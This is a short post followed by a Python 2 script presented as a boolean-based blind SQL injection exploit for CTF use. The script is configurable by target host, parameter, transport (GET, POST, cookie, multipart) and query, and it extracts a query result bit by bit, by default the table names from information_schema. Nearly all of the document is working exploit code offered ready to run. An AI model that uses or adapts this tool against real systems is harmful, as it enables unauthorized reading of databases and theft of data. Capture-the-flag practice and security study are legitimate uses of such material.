Sometimes I need blind SQL injection code for a CTF.
I will add more functions.
import sys
import re
import urllib
import urllib2
import inspect
#import base64
#import mimetypes
#import pprint
def set_globalvar():
    """Populate the module-level configuration read by the other helpers.

    Binds these module globals: ``query`` (the SQL expression whose result
    is read back), ``n``, ``host``, ``url``, ``parameter``, ``findout``
    (the marker string whose presence in a response stands for "true"),
    ``type_attack`` (one of "GET", "POST", "COOKIE", "MULTIPART") and the
    ``sqli_start`` / ``sqli_end`` fragments wrapped around each condition.
    Returns None.
    """
    global type_attack, host, findout, n, query
    global sqli_start, sqli_end, url, parameter

    # Expression read back bit by bit; a plain "SELECT 1" is a cheap way to
    # check that the setup works before using a longer query.
    query = "SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.columns"
    n = 8

    # Target location and the name of the injectable parameter.
    host = "http://127.0.0.1"
    url = "/sqli.php"
    parameter = "a"

    # Substring that set_getbit() looks for in the response text.
    findout = "Sample"

    # NOTE: not declared global, so this stays a local and is never read
    # anywhere; the commented-out Cookie header in set_send() refers to it.
    session = ""

    # Transport used by set_send(); the other accepted values are
    # "POST", "COOKIE" and "MULTIPART".
    type_attack = "GET"

    # Placed before / after the generated condition.
    sqli_start = "1 AND "
    sqli_end = "--"
def set_error():
    """Print a diagnostic naming the calling function and return 0.

    The name comes from one frame up the stack (``inspect.stack()[1]``),
    i.e. whichever function invoked set_error().
    """
    caller_name = inspect.stack()[1][3]
    msg = "It is an error MSG from function: %s" % caller_name
    print(msg)
    return 0
def printr(data):
    """Stream every element of *data* to stdout, then print a closing banner.

    Elements are written with ``sys.stdout.write`` (no separator, no
    newline) and flushed one at a time, so a slowly-produced generator
    shows progress as it goes. Two empty lines and "[*] Exploit Complete!"
    are printed afterwards. Returns None.
    """
    out = sys.stdout
    for chunk in data:
        out.write(chunk)
        out.flush()
    print("")
    print("")
    print("[*] Exploit Complete!")
def set_send(params):
    """Wrap *params* in a boolean condition, send it with the configured
    transport and return the response (headers plus body) as one string.

    Reads the module globals bound by set_globalvar(): sqli_start, sqli_end,
    type_attack, host, url, parameter. The condition sent is
    ``sqli_start + "IF(1=1,<params>,0)" + sqli_end``; the URL-quoted form is
    used for the GET and COOKIE transports, the raw form for POST and
    MULTIPART.

    Returns the response header values joined with newlines, then a newline,
    then the repr() of every body line concatenated; set_getbit() searches
    this text for the ``findout`` marker.

    If type_attack matches none of the four transports, ``resp`` is never
    bound and the last lines raise UnboundLocalError; get_sqlexploit()
    validates type_attack before anything reaches this function.
    """
    params = "IF(1=1,%s,0)" % (params)
    finalquery=sqli_start+params+sqli_end
    encoding_finalquery = urllib2.quote(finalquery)
    if(type_attack=="GET"):
        # Query-string transport. The first commented line shows how a
        # session cookie was meant to be attached; enabling it as written
        # would raise NameError, because set_globalvar() never declares
        # `session` global.
        action = urllib2.build_opener()
        #action.addheaders.append(('Cookie', 'SESSION=%s' %(session)))
        #resp = urllib2.urlopen(host+url+"?"+parameter+"="+encoding_finalquery)
        resp = action.open(host+url+"?"+parameter+"="+encoding_finalquery)
    elif(type_attack=="POST"):
        # Form-encoded body; `cookie` is a misnomer, it holds the POST data.
        values = {parameter : finalquery}
        cookie = urllib.urlencode(values)
        resp = urllib2.urlopen(host+url, cookie)
    elif(type_attack=="COOKIE"):
        # The condition travels in a cookie named after `parameter`.
        action = urllib2.build_opener()
        action.addheaders.append(('Cookie', '%s=%s' % (parameter, encoding_finalquery)))
        resp = action.open(host+url)
    elif(type_attack=="MULTIPART"):
        # Hand-built multipart/form-data body with a fixed boundary: one
        # text field carrying the condition, plus a dummy file part named
        # "pwd" whose content is the four bytes '1234'.
        filename = "test.php"
        CRLF = '\r\n'
        boundary = '----WebKitFormBoundaryL4f8jRRQx76T6nV9'
        parts = []
        parts.append('--' + boundary)
        parts.append('Content-Disposition: form-data; name="%s"' % (parameter))
        parts.append('')
        parts.append(finalquery)
        parts.append('--' + boundary)
        parts.append('Content-Disposition: form-data; name="pwd"; filename="%s"' % (filename))
        parts.append('Content-Type: application/octet-stream')
        parts.append('')
        parts.append('1234')
        parts.append('--' + boundary + '--')
        parts.append('')
        body= CRLF.join(parts)
        headers = {'content-type' : 'multipart/form-data; boundary=%s' % (boundary)}
        req = urllib2.Request(host+url, body, headers)
        resp = urllib2.urlopen(req)
    # Each item yielded by iterating resp.info() (presumably a header name)
    # is looked up with .get(), so the header *values* end up in the text;
    # the body follows as the repr() of each line, so quotes and escapes
    # are part of what set_getbit() sees.
    data = "\n".join([resp.info().get(i) for i in resp.info()])
    data += "\n" + "".join([repr(x) for x in resp])
    return data
def set_getbit(data):
    """Turn one response text into a single oracle bit, '1' or '0'.

    Runs ``re.findall`` with the module-level ``findout`` marker over
    *data* and returns '1' when the marker string itself is among the
    matches, else '0'. Because the check is ``findout in matches``, this
    only works when findout is a literal substring: a pattern with groups
    or metacharacters makes findall return tuples or different text, and
    the result is then always '0'.

    Raises RuntimeError in place of IndexError or TypeError (for instance
    when *data* is None), so callers can treat any lookup failure uniformly.
    """
    try:
        matches = re.findall(findout, data)
    except (IndexError, TypeError):
        raise RuntimeError
    return '1' if findout in matches else '0'
def set_getvalue(val, n=8):
    """Read the integer value of SQL expression *val* one bit at a time.

    For each bit position from n-1 down to 0 the condition
    ``(<val>>><bit>&1)`` is sent through set_send() and the response is
    turned into '1'/'0' by set_getbit(); the collected bits (most
    significant first) are parsed as base 2. *n* is the bit width: the
    default 8 reads one byte, set_getlength() passes 32. The parameter
    shadows the module global ``n``, which is not consulted here.
    A RuntimeError from set_getbit() propagates to the caller; n == 0
    yields an empty bit string and int() raises ValueError.
    """
    bits = []
    for position in reversed(range(n)):
        condition = "(%s>>%d&1)" % (val, position)
        bits.append(set_getbit(set_send(condition)))
    return int("".join(bits), 2)
def set_getlength(content):
    """Return the value of ``LENGTH(content)`` read back with a 32-bit width.

    Thin wrapper over set_getvalue(); errors from it propagate unchanged.
    """
    length_expr = "LENGTH(%s)" % content
    return set_getvalue(length_expr, 32)
def set_getstring(content):
    """Yield the characters of SQL expression *content*, one per extraction.

    First reads the length with set_getlength() and prints it, then for
    every position i in 0..length (inclusive, i.e. length+1 iterations)
    reads ``ASCII(MID((content),i,1))`` with set_getvalue() and yields
    chr() of the result. Position 0 is included, so the first yielded
    character is whatever the target returns for that position.
    RuntimeError from the lower layers propagates out of the generator.
    """
    length = set_getlength(content)
    print(" [-] Lengh: %s" % length)
    print(" [-] Result")
    position = 0
    while position <= length:
        char_expr = "ASCII(MID((%s),%d,1))" % (content, position)
        yield chr(set_getvalue(char_expr))
        position += 1
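def get_sqlexploit(query):
    """Generator yielding the characters of *query*'s result via the oracle.

    Prints the configured transport, then validates the module global
    ``type_attack`` against the four values set_send() understands. On a
    bad value it prints a hint, calls set_error() and yields nothing.
    Otherwise it delegates to set_getstring("(<query>)") and re-yields each
    character; if the lower layers raise RuntimeError the generator yields
    the single string "SQL error." and stops.
    """
    print(" [-] Method: %s" % (type_attack))
    # Membership test instead of the original `is` chain: `is` compares
    # identity, which only matched the literals by accident of CPython's
    # string interning and fails for an equal string built at runtime.
    if type_attack not in ("GET", "POST", "COOKIE", "MULTIPART"):
        print("Please check type of the attack")
        set_error()
        return
    # Conditional syntax differs per dialect; the helpers use the MySQL form:
    #   MySQL:      IF(condition,true-part,false-part), e.g. SELECT IF(1=1,'true','false')
    #   SQL Server: IF condition true-part ELSE false-part, e.g. IF (1=1) SELECT 'true' ELSE SELECT 'false'
    try:
        for char in set_getstring("(%s)" % (query)):
            yield char
    except RuntimeError:
        yield "SQL error."
        # `return`, not `raise StopIteration`: inside a generator PEP 479
        # (Python 3.7+) converts an explicit StopIteration into RuntimeError.
        return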
def main():
    """Entry point: load the configuration, print the banner, run the extraction.

    The characters produced by get_sqlexploit(query) are streamed through
    printr(). Returns None.
    """
    set_globalvar()
    banner = [
        " - A Bool-based SQL Injection Vulnerability Exploit",
        "",
        " Author: Kerz",
        " Date: 05/07/2013",
        "",
    ]
    for line in banner:
        print(line)
    # The original wrote `"[*] Target: %s" % host+url`, which formats host
    # and then appends url; that prints the same text as formatting the
    # concatenation, written here explicitly.
    print("[*] Target: %s" % (host + url))
    print("[+] Injection")
    printr(get_sqlexploit(query))


if __name__ == '__main__':
    main()
Reference: www.exploit-db.com/download_pdf/12967/